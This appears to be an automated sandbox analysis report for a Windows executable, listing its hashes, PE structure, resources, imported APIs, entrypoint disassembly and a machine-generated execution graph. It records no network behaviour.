SHA1:b62f2cfb8d9856dd59416675bc5d0bfaa748a1be
SHA256:86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
SHA512:e43b555e36bd06d380656f5752229059de59c1e973832a7b533212f00bfc968edc8ae43fb3e407dd58d93ed80e7833185049d751a75aaa8382e4f91612d1fb0b
SSDEEP:6144:ntH/xNLaAOvIBd7lAAxWS1elIoSN6WX+t45q0cp:ntH5NLaAdDhAAEIFcWX+t4oz
TLSH:7774B0027AC585B2D57328331A359F20A67D7C301F758EDB9394695EDE321C09B32BA7
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w..<.V..w..<.T..w..<.U..w....Z..w.......w.......w.......w....$..w....4..w...w...v.......w.......w....X..w.......w.

File Icon

Icon Hash:1515d4d4442f2d2d

Static PE Info

General

Entrypoint:0x420780
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6474CCD4 [Mon May 29 16:03:32 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:0ae9e38912ff6bd742a1b9e5c003576a

Entrypoint Preview

Instruction
call 00007F332C6F10CBh
jmp 00007F332C6F0A7Dh
int3
int3
int3
int3
int3
int3
push 00423A80h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [004407A8h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F332C6E3911h
push 0043D14Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F332C6F3725h
int3
jmp 00007F332C6F55F8h
push ebp
mov ebp, esp
and dword ptr [00463D58h], 00000000h
sub esp, 24h
or dword ptr [004407A0h], 01h
push 0000000Ah
call dword ptr [004341C4h]
test eax, eax
je 00007F332C6F0DB2h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]

Rich Headers

Programming Language:
  • [ C ] VS2008 SP1 build 30729
  • [IMP] VS2008 SP1 build 30729

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x3e3800x34.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x3e3b40x50.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000xdff8.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000x23dc.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x3c1b00x54.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x366a80x40.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x340000x278.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3d85c0x120.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x32dbc0x32e0059fca22eb14bf065790ccabf936fb764False0.5921807816339066data6.705384121865264IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x340000xb1d00xb2003d7416119125f570d6c385b5ba208d7aFalse0.46034497893258425data5.270635796862559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x400000x247500x1200edc39ed5cd62e969c2b4607a1a95cf98False0.4058159722222222data4.083550519415643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat0x650000x1a40x200185ed7102f068a73891dd850643e3d14False0.46484375data3.50335535460232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc0x660000xdff80xe000699399d7d2e63f9a36984a221fc02f75False0.6373465401785714data6.63871928699419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x740000x23dc0x2400539b0c53eda4d1d9ffe2e69d5037d71fFalse0.7864583333333334data6.678617573231213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountryZLIB Complexity
PNG0x666500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
PNG0x671980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
RT_ICON0x687480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
RT_ICON0x68cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
RT_ICON0x695580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
RT_ICON0x6a4000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
RT_ICON0x6a8680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
RT_ICON0x6b9100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
RT_ICON0x6deb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
RT_DIALOG0x725880x286dataEnglishUnited States0.5092879256965944
RT_DIALOG0x723580x13adataEnglishUnited States0.60828025477707
RT_DIALOG0x724980xecdataEnglishUnited States0.6991525423728814
RT_DIALOG0x722280x12edataEnglishUnited States0.5927152317880795
RT_DIALOG0x71ef00x338dataEnglishUnited States0.45145631067961167
RT_DIALOG0x71c980x252dataEnglishUnited States0.5757575757575758
RT_STRING0x72f680x1e2dataEnglishUnited States0.3900414937759336
RT_STRING0x731500x1ccdataEnglishUnited States0.4282608695652174
RT_STRING0x733200x1b8dataEnglishUnited States0.45681818181818185
RT_STRING0x734d80x146dataEnglishUnited States0.5153374233128835
RT_STRING0x736200x46cdataEnglishUnited States0.3454063604240283
RT_STRING0x73a900x166dataEnglishUnited States0.49162011173184356
RT_STRING0x73bf80x152dataEnglishUnited States0.5059171597633136
RT_STRING0x73d500x10adataEnglishUnited States0.49624060150375937
RT_STRING0x73e600xbcdataEnglishUnited States0.6329787234042553
RT_STRING0x73f200xd6dataEnglishUnited States0.5747663551401869
RT_GROUP_ICON0x71c300x68dataEnglishUnited States0.7019230769230769
RT_MANIFEST0x728100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

Imports

DLLImport
KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

General

Target ID:0
Start time:09:32:21
Start date:30/09/2024
Path:C:\Users\user\Desktop\fcl52nBWuY.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\fcl52nBWuY.exe"
Imagebase:0x40000
File size:339'886 bytes
MD5 hash:F80C1317F5043D991A91E5FB6399E658
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Disassembly

Reset < >

    Execution Graph

    Execution Coverage:9.2%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:10.2%
    Total number of Nodes:1516
    Total number of Limit Nodes:46
    execution_graph 26098 5c306 GetDlgItem EnableWindow ShowWindow SendMessageW 24071 60602 24072 6060e ___scrt_is_nonwritable_in_current_image 24071->24072 24103 6019c 24072->24103 24074 60615 24075 60768 24074->24075 24078 6063f 24074->24078 24180 609fa IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24075->24180 24077 6076f 24173 6930a 24077->24173 24088 6067e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24078->24088 24114 69ead 24078->24114 24085 6065e 24093 606df 24088->24093 24176 68dfc 38 API calls _abort 24088->24176 24089 606e5 24123 69dfe 51 API calls 24089->24123 24092 606ed 24124 5f04c 24092->24124 24122 60b15 GetStartupInfoW _abort 24093->24122 24097 60701 24097->24077 24098 60705 24097->24098 24099 6070e 24098->24099 24178 692ad 28 API calls _abort 24098->24178 24179 6030d 12 API calls ___scrt_uninitialize_crt 24099->24179 24102 60716 24102->24085 24104 601a5 24103->24104 24182 60816 IsProcessorFeaturePresent 24104->24182 24106 601b1 24183 63bde 24106->24183 24108 601b6 24109 601ba 24108->24109 24191 69d37 24108->24191 24109->24074 24112 601d1 24112->24074 24117 69ec4 24114->24117 24115 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24116 60658 24115->24116 24116->24085 24118 69e51 24116->24118 24117->24115 24119 69e80 24118->24119 24120 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24119->24120 24121 69ea9 24120->24121 24121->24088 24122->24089 24123->24092 24248 51b7c 24124->24248 24128 5f06c 24297 5bd0b 24128->24297 24130 5f075 _abort 24131 5f088 GetCommandLineW 24130->24131 24132 5f12c GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24131->24132 24133 5f09b 24131->24133 24312 44a20 24132->24312 24301 5d6f8 24133->24301 24138 5f126 24306 5ed1e 24138->24306 24139 5f0a9 OpenFileMappingW 24142 5f0c1 MapViewOfFile 24139->24142 24143 5f11d CloseHandle 24139->24143 24145 5f116 UnmapViewOfFile 24142->24145 24146 5f0d2 __InternalCxxFrameHandler 24142->24146 24143->24132 24145->24143 24150 5ed1e 2 API calls 24146->24150 24152 5f0ee 24150->24152 24345 50695 83 API calls 24152->24345 24153 5a0c7 27 API calls 24155 5f1f3 DialogBoxParamW 24153->24155 24159 5f22d 24155->24159 24156 5f102 24346 5074b 83 API calls _wcslen 24156->24346 24158 5f10d 24158->24145 24160 5f246 24159->24160 24161 5f23f Sleep 24159->24161 24163 5f254 24160->24163 24347 5bfa3 CompareStringW SetCurrentDirectoryW _abort _wcslen 24160->24347 24161->24160 24164 5f273 DeleteObject 24163->24164 24165 5f28f 24164->24165 24166 5f288 DeleteObject 24164->24166 24167 5f2c0 24165->24167 24168 5f2d2 24165->24168 24166->24165 24348 5ed7b 6 API calls 24167->24348 24342 5bd71 24168->24342 24170 5f2c6 CloseHandle 24170->24168 24172 5f30c 24177 60b4b GetModuleHandleW 24172->24177 24647 69087 24173->24647 24176->24093 24177->24097 24178->24099 24179->24102 24180->24077 24182->24106 24195 64c87 24183->24195 24187 63bef 24188 63bfa 24187->24188 24209 64cc3 DeleteCriticalSection 24187->24209 24188->24108 24190 63be7 24190->24108 24236 6d20a 24191->24236 24194 63bfd 7 API calls 2 library calls 24194->24109 24197 64c90 24195->24197 24198 64cb9 24197->24198 24200 63be3 24197->24200 24210 64ecc 24197->24210 24215 64cc3 DeleteCriticalSection 24198->24215 24200->24190 24201 63d0c 24200->24201 24229 64ddd 24201->24229 24204 63d21 24204->24187 24206 63d2f 24207 63d3c 24206->24207 24235 63d3f 6 API calls ___vcrt_FlsFree 24206->24235 24207->24187 24209->24190 24216 64cf2 24210->24216 24213 64f04 InitializeCriticalSectionAndSpinCount 24214 64eef 24213->24214 24214->24197 24215->24200 24217 64d0f 24216->24217 24221 64d13 24216->24221 24217->24213 24217->24214 24218 64d7b GetProcAddress 24218->24217 24220 64d89 24218->24220 24220->24217 24221->24217 24221->24218 24222 64d6c 24221->24222 24224 64d92 LoadLibraryExW 24221->24224 24222->24218 24223 64d74 FreeLibrary 24222->24223 24223->24218 24225 64dd9 24224->24225 24226 64da9 GetLastError 24224->24226 24225->24221 24226->24225 24227 64db4 ___vcrt_FlsFree 24226->24227 24227->24225 24228 64dca LoadLibraryExW 24227->24228 24228->24221 24230 64cf2 ___vcrt_FlsFree 5 API calls 24229->24230 24231 64df7 24230->24231 24232 64e10 TlsAlloc 24231->24232 24233 63d16 24231->24233 24233->24204 24234 64e8e 6 API calls ___vcrt_FlsFree 24233->24234 24234->24206 24235->24204 24239 6d223 24236->24239 24238 601c3 24238->24112 24238->24194 24240 60d6c 24239->24240 24241 60d74 24240->24241 24242 60d75 IsProcessorFeaturePresent 24240->24242 24241->24238 24244 60db7 24242->24244 24247 60d7a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24244->24247 24246 60e9a 24246->24238 24247->24246 24349 5ffc0 24248->24349 24251 51ba1 GetProcAddress 24254 51bd2 GetProcAddress 24251->24254 24255 51bba 24251->24255 24252 51c00 24253 51f2d GetModuleFileNameW 24252->24253 24360 689de 42 API calls 2 library calls 24252->24360 24264 51f4b 24253->24264 24257 51be4 24254->24257 24255->24254 24257->24252 24258 51e6d 24258->24253 24259 51e78 GetModuleFileNameW CreateFileW 24258->24259 24260 51f21 CloseHandle 24259->24260 24261 51ea8 SetFilePointer 24259->24261 24260->24253 24261->24260 24262 51eb6 ReadFile 24261->24262 24262->24260 24266 51ed4 24262->24266 24267 51fad GetFileAttributesW 24264->24267 24268 51fc5 24264->24268 24270 51f76 CompareStringW 24264->24270 24351 4c619 24264->24351 24354 51b34 24264->24354 24266->24260 24269 51b34 2 API calls 24266->24269 24267->24264 24267->24268 24271 51fd0 24268->24271 24274 52005 24268->24274 24269->24266 24270->24264 24273 51fe9 GetFileAttributesW 24271->24273 24275 52001 24271->24275 24272 52114 24296 5b64d GetCurrentDirectoryW 24272->24296 24273->24271 24273->24275 24274->24272 24276 4c619 GetVersionExW 24274->24276 24275->24274 24277 5201f 24276->24277 24278 52026 24277->24278 24279 5208c 24277->24279 24280 51b34 2 API calls 24278->24280 24281 44a20 _swprintf 51 API calls 24279->24281 24283 52030 24280->24283 24282 520b4 AllocConsole 24281->24282 24284 520c1 GetCurrentProcessId AttachConsole 24282->24284 24285 5210c ExitProcess 24282->24285 24286 51b34 2 API calls 24283->24286 24365 64f93 24284->24365 24288 5203a 24286->24288 24361 4f937 24288->24361 24289 520e2 GetStdHandle WriteConsoleW Sleep FreeConsole 24289->24285 24292 44a20 _swprintf 51 API calls 24293 52068 24292->24293 24294 4f937 53 API calls 24293->24294 24295 52077 24294->24295 24295->24285 24296->24128 24298 51b34 2 API calls 24297->24298 24299 5bd1f OleInitialize 24298->24299 24300 5bd42 GdiplusStartup SHGetMalloc 24299->24300 24300->24130 24302 5d702 24301->24302 24303 5d818 24302->24303 24304 532f7 CharUpperW 24302->24304 24390 5074b 83 API calls _wcslen 24302->24390 24303->24138 24303->24139 24304->24302 24307 5ffc0 24306->24307 24308 5ed2b SetEnvironmentVariableW 24307->24308 24310 5ed4e 24308->24310 24309 5ed76 24309->24132 24310->24309 24311 5ed6a SetEnvironmentVariableW 24310->24311 24311->24309 24391 449f3 24312->24391 24315 5c8bd LoadBitmapW 24316 5c8de 24315->24316 24317 5c8eb GetObjectW 24315->24317 24468 5b6c2 FindResourceW 24316->24468 24321 5c8fa 24317->24321 24463 5b5c6 24321->24463 24323 5c950 24334 4ed62 24323->24334 24324 5c92c 24484 5b605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24324->24484 24325 5b6c2 13 API calls 24327 5c91d 24325->24327 24327->24324 24329 5c923 DeleteObject 24327->24329 24328 5c934 24485 5b5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24328->24485 24329->24324 24331 5c93d 24486 5b80c 8 API calls 24331->24486 24333 5c944 DeleteObject 24333->24323 24497 4ed87 24334->24497 24339 5a0c7 24630 5feae 24339->24630 24341 5a0e6 24341->24153 24343 5bda0 GdiplusShutdown CoUninitialize 24342->24343 24343->24172 24345->24156 24346->24158 24347->24163 24348->24170 24350 51b86 GetModuleHandleW 24349->24350 24350->24251 24350->24252 24352 4c62d GetVersionExW 24351->24352 24353 4c669 24351->24353 24352->24353 24353->24264 24355 5ffc0 24354->24355 24356 51b41 GetSystemDirectoryW 24355->24356 24357 51b77 24356->24357 24358 51b59 24356->24358 24357->24264 24359 51b6a LoadLibraryW 24358->24359 24359->24357 24360->24258 24362 4f947 24361->24362 24367 4f968 24362->24367 24366 64f9b 24365->24366 24366->24289 24366->24366 24373 4ecd0 24367->24373 24370 4f965 24370->24292 24371 4f98b LoadStringW 24371->24370 24372 4f9a2 LoadStringW 24371->24372 24372->24370 24378 4ec0c 24373->24378 24375 4eced 24376 4ed02 24375->24376 24386 4ed10 26 API calls 24375->24386 24376->24370 24376->24371 24379 4ec24 24378->24379 24385 4eca4 _strncpy 24378->24385 24381 4ec48 24379->24381 24387 530e5 WideCharToMultiByte 24379->24387 24384 4ec79 24381->24384 24388 4f8d1 50 API calls __vsnprintf 24381->24388 24389 67561 26 API calls 3 library calls 24384->24389 24385->24375 24386->24376 24387->24381 24388->24384 24389->24385 24390->24302 24392 44a0a __vsnwprintf_l 24391->24392 24395 672d2 24392->24395 24398 65395 24395->24398 24399 653d5 24398->24399 24400 653bd 24398->24400 24399->24400 24402 653dd 24399->24402 24415 6a7db 20 API calls __dosmaperr 24400->24415 24417 65934 24402->24417 24404 653c2 24416 651a9 26 API calls ___std_exception_copy 24404->24416 24408 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24410 44a14 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24408->24410 24409 65465 24426 65ce4 51 API calls 4 library calls 24409->24426 24410->24315 24413 65470 24427 659b7 20 API calls _free 24413->24427 24414 653cd 24414->24408 24415->24404 24416->24414 24418 65951 24417->24418 24424 653ed 24417->24424 24418->24424 24428 6a505 GetLastError 24418->24428 24420 65972 24449 6aae6 38 API calls __fassign 24420->24449 24422 6598b 24450 6ab13 38 API calls __fassign 24422->24450 24425 658ff 20 API calls 2 library calls 24424->24425 24425->24409 24426->24413 24427->24414 24429 6a527 24428->24429 24430 6a51b 24428->24430 24452 6c2e6 20 API calls 2 library calls 24429->24452 24451 6c00b 11 API calls 2 library calls 24430->24451 24433 6a521 24433->24429 24435 6a570 SetLastError 24433->24435 24434 6a533 24436 6a53b 24434->24436 24459 6c061 11 API calls 2 library calls 24434->24459 24435->24420 24453 6a65a 24436->24453 24439 6a550 24439->24436 24441 6a557 24439->24441 24440 6a541 24442 6a57c SetLastError 24440->24442 24460 6a370 20 API calls _abort 24441->24460 24461 6a0e4 38 API calls _abort 24442->24461 24444 6a562 24446 6a65a _free 20 API calls 24444->24446 24448 6a569 24446->24448 24448->24435 24448->24442 24449->24422 24450->24424 24451->24433 24452->24434 24454 6a665 RtlFreeHeap 24453->24454 24455 6a68e __dosmaperr 24453->24455 24454->24455 24456 6a67a 24454->24456 24455->24440 24462 6a7db 20 API calls __dosmaperr 24456->24462 24458 6a680 GetLastError 24458->24455 24459->24439 24460->24444 24462->24458 24487 5b5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24463->24487 24465 5b5cd 24466 5b5d9 24465->24466 24488 5b605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24465->24488 24466->24323 24466->24324 24466->24325 24469 5b6e5 SizeofResource 24468->24469 24470 5b7d3 24468->24470 24469->24470 24471 5b6fc LoadResource 24469->24471 24470->24317 24470->24321 24471->24470 24472 5b711 LockResource 24471->24472 24472->24470 24473 5b722 GlobalAlloc 24472->24473 24473->24470 24474 5b73d GlobalLock 24473->24474 24475 5b7cc GlobalFree 24474->24475 24476 5b74c __InternalCxxFrameHandler 24474->24476 24475->24470 24477 5b754 CreateStreamOnHGlobal 24476->24477 24478 5b7c5 GlobalUnlock 24477->24478 24479 5b76c 24477->24479 24478->24475 24489 5b626 GdipAlloc 24479->24489 24482 5b7b0 24482->24478 24483 5b79a GdipCreateHBITMAPFromBitmap 24483->24482 24484->24328 24485->24331 24486->24333 24487->24465 24488->24466 24490 5b645 24489->24490 24491 5b638 24489->24491 24490->24478 24490->24482 24490->24483 24493 5b3b8 24491->24493 24494 5b3e0 GdipCreateBitmapFromStream 24493->24494 24495 5b3d9 GdipCreateBitmapFromStreamICM 24493->24495 24496 5b3e5 24494->24496 24495->24496 24496->24490 24498 4ed95 __EH_prolog 24497->24498 24499 4edc4 GetModuleFileNameW 24498->24499 24500 4edf5 24498->24500 24501 4edde 24499->24501 24543 4ab40 24500->24543 24501->24500 24503 4ee51 24554 67720 24503->24554 24507 4f581 79 API calls 24509 4ee25 24507->24509 24508 4ee64 24510 67720 26 API calls 24508->24510 24509->24503 24509->24507 24521 4f06a 24509->24521 24518 4ee76 ___vcrt_FlsFree 24510->24518 24511 4efa5 24511->24521 24590 4b000 82 API calls 24511->24590 24515 4efbf ___std_exception_copy 24516 4ae60 83 API calls 24515->24516 24515->24521 24519 4efe8 ___std_exception_copy 24516->24519 24518->24511 24518->24521 24568 4b110 24518->24568 24584 4ae60 24518->24584 24589 4b000 82 API calls 24518->24589 24519->24521 24537 4eff3 _wcslen ___std_exception_copy ___vcrt_FlsFree 24519->24537 24591 52ec2 MultiByteToWideChar 24519->24591 24577 4a801 24521->24577 24522 4f479 24527 4f4fe 24522->24527 24597 6a08e 26 API calls 2 library calls 24522->24597 24524 4f48e 24598 68a08 26 API calls 2 library calls 24524->24598 24526 4f534 24532 67720 26 API calls 24526->24532 24527->24526 24531 4f581 79 API calls 24527->24531 24529 4f4e6 24599 4f59c 79 API calls 24529->24599 24531->24527 24533 4f54d 24532->24533 24534 67720 26 API calls 24533->24534 24534->24521 24537->24521 24537->24522 24538 530e5 WideCharToMultiByte 24537->24538 24592 4f8d1 50 API calls __vsnprintf 24537->24592 24593 67561 26 API calls 3 library calls 24537->24593 24594 6a08e 26 API calls 2 library calls 24537->24594 24595 68a08 26 API calls 2 library calls 24537->24595 24596 4f59c 79 API calls 24537->24596 24538->24537 24541 4f5be GetModuleHandleW FindResourceW 24542 4ed75 24541->24542 24542->24339 24544 4ab4a 24543->24544 24545 4abab CreateFileW 24544->24545 24546 4abcc GetLastError 24545->24546 24549 4ac1b 24545->24549 24600 4cf32 24546->24600 24548 4abec 24548->24549 24551 4abf0 CreateFileW GetLastError 24548->24551 24550 4ac5f 24549->24550 24552 4ac45 SetFileTime 24549->24552 24550->24509 24551->24549 24553 4ac15 24551->24553 24552->24550 24553->24549 24555 67759 24554->24555 24556 6775d 24555->24556 24567 67785 24555->24567 24604 6a7db 20 API calls __dosmaperr 24556->24604 24558 67762 24605 651a9 26 API calls ___std_exception_copy 24558->24605 24559 67aa9 24561 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24559->24561 24563 67ab6 24561->24563 24562 6776d 24564 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24562->24564 24563->24508 24566 67779 24564->24566 24566->24508 24567->24559 24606 67640 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24567->24606 24569 4b135 24568->24569 24570 4b122 24568->24570 24571 4b140 24569->24571 24573 4b148 SetFilePointer 24569->24573 24570->24571 24607 47800 78 API calls 24570->24607 24571->24518 24573->24571 24574 4b164 GetLastError 24573->24574 24574->24571 24575 4b16e 24574->24575 24575->24571 24608 47800 78 API calls 24575->24608 24578 4a825 24577->24578 24579 4a836 24577->24579 24578->24579 24580 4a831 24578->24580 24581 4a838 24578->24581 24579->24541 24609 4a9ae 24580->24609 24614 4a880 24581->24614 24585 4ae6c 24584->24585 24587 4ae73 24584->24587 24585->24518 24587->24585 24588 4a9e5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24587->24588 24629 477bd 78 API calls 24587->24629 24588->24587 24589->24518 24590->24515 24591->24537 24592->24537 24593->24537 24594->24537 24595->24537 24596->24537 24597->24524 24598->24529 24599->24527 24601 4cf3f _wcslen 24600->24601 24602 4cfe7 GetCurrentDirectoryW 24601->24602 24603 4cf68 _wcslen 24601->24603 24602->24603 24603->24548 24604->24558 24605->24562 24606->24567 24607->24569 24608->24571 24610 4a9b7 24609->24610 24611 4a9e1 24609->24611 24610->24611 24620 4b470 24610->24620 24611->24579 24615 4a88c 24614->24615 24616 4a8aa 24614->24616 24615->24616 24618 4a898 CloseHandle 24615->24618 24617 4a8c9 24616->24617 24628 47685 77 API calls 24616->24628 24617->24579 24618->24616 24621 5ffc0 24620->24621 24622 4b47d DeleteFileW 24621->24622 24623 4b490 24622->24623 24624 4a9df 24622->24624 24625 4cf32 GetCurrentDirectoryW 24623->24625 24624->24579 24626 4b4a4 24625->24626 24626->24624 24627 4b4a8 DeleteFileW 24626->24627 24627->24624 24628->24617 24629->24587 24631 5feb3 ___std_exception_copy 24630->24631 24632 5fecd 24631->24632 24634 5fecf 24631->24634 24645 68e4c 7 API calls 2 library calls 24631->24645 24632->24341 24635 448f5 Concurrency::cancel_current_task 24634->24635 24637 5fed9 24634->24637 24643 63330 RaiseException 24635->24643 24646 63330 RaiseException 24637->24646 24638 44911 24642 44927 24638->24642 24644 4136b 26 API calls Concurrency::cancel_current_task 24638->24644 24640 60810 24642->24341 24643->24638 24644->24642 24645->24631 24646->24640 24648 69093 _abort 24647->24648 24649 690ac 24648->24649 24650 6909a 24648->24650 24671 6bde1 EnterCriticalSection 24649->24671 24683 691e1 